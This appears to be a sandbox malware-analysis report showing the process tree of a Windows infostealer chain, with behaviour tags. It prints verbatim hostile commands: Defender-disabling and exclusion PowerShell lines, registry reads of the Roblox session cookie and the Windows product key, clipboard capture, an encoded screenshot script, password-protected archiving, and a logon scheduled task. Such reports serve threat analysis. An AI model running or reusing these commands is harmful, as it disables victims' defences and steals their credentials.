PID 916 wrote to memory of 2288 916 cmd.exe 127 PID 916 wrote to memory of 2288 916 cmd.exe 127 PID 100 wrote to memory of 1456 100 based.exe 128 PID 100 wrote to memory of 1456 100 based.exe 128 PID 100 wrote to memory of 4260 100 based.exe 130 PID 100 wrote to memory of 4260 100 based.exe 130 PID 100 wrote to memory of 4932 100 based.exe 133 PID 100 wrote to memory of 4932 100 based.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI13722\Build.exe -pbeznogym5⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\_MEI13722\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI13722\Build.exe -pbeznogym6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:220 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI44122\Build.exe -pbeznogym9⤵
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Users\Admin\AppData\Local\Temp\_MEI44122\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI44122\Build.exe -pbeznogym10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3472
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"11⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3336
-
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"9⤵PID:3804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"9⤵PID:856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"9⤵PID:1808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"9⤵PID:3208
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"9⤵
- Clipboard Data
PID:4440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard10⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵PID:1456
-
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:4260
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:2400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"9⤵PID:4932
-
C:\Windows\system32\systeminfo.exesysteminfo10⤵
- Gathers system information
PID:5248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="9⤵PID:3964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5188 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqj1jdql\lqj1jdql.cmdline"11⤵PID:6116
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES90D1.tmp" "c:\Users\Admin\AppData\Local\Temp\lqj1jdql\CSC6FADDFF0AEED418089CC6DAD51E828E.TMP"12⤵PID:1236
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"9⤵PID:5132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:5316
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:6056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:4820
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:4040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:4364
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:5384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:5396
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:5560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"9⤵PID:5500
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:3332
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:5532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"9⤵PID:5568
-
C:\Windows\system32\getmac.exegetmac10⤵PID:5648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23682\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\FjH3i.zip" *"9⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\_MEI23682\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI23682\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\FjH3i.zip" *10⤵
- Executes dropped EXE
PID:6116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"9⤵PID:5408
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption10⤵
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"9⤵PID:2940
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory10⤵PID:32
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"9⤵PID:3772
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid10⤵PID:5128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"9⤵PID:5244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"9⤵PID:5176
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:2344
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name10⤵
- Detects videocard installed
PID:4216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"9⤵PID:5884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault10⤵
- Suspicious behavior: EnumeratesProcesses
PID:5964
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013267001\kelyBT9.exe"C:\Users\Admin\AppData\Local\Temp\1013267001\kelyBT9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SecurityHealthSystray.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\SecurityHealthSystray.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013272001\3a506c3419.exe"C:\Users\Admin\AppData\Local\Temp\1013272001\3a506c3419.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 15004⤵
- Program crash
PID:4588
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013273001\15e7dc7aff.exe"C:\Users\Admin\AppData\Local\Temp\1013273001\15e7dc7aff.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5344
-
-
C:\Users\Admin\AppData\Local\Temp\1013274001\991591cf9b.exe"C:\Users\Admin\AppData\Local\Temp\1013274001\991591cf9b.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5028 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
